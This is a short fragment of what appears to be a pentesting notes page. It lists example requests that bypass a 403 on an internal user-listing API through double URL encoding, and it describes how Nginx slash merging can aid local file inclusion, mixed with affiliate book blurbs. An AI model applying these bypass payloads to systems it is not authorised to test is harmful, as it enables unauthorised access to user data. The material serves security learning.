GET /api/internal/getAllUsers -> 403
GET /api/internal/getAllUserz -> 404
GET /api/internal/../getAllUsers -> 403
GET /api/internal/getAllUser%73 -> 403
GET /api/internal/getAllUser%2573 -> 200 WIN
%73 =s
%25873 =s
Web Cache Deception
Resources
Interesting Books
Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
The directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so /// would become /. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it.
Source:
The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.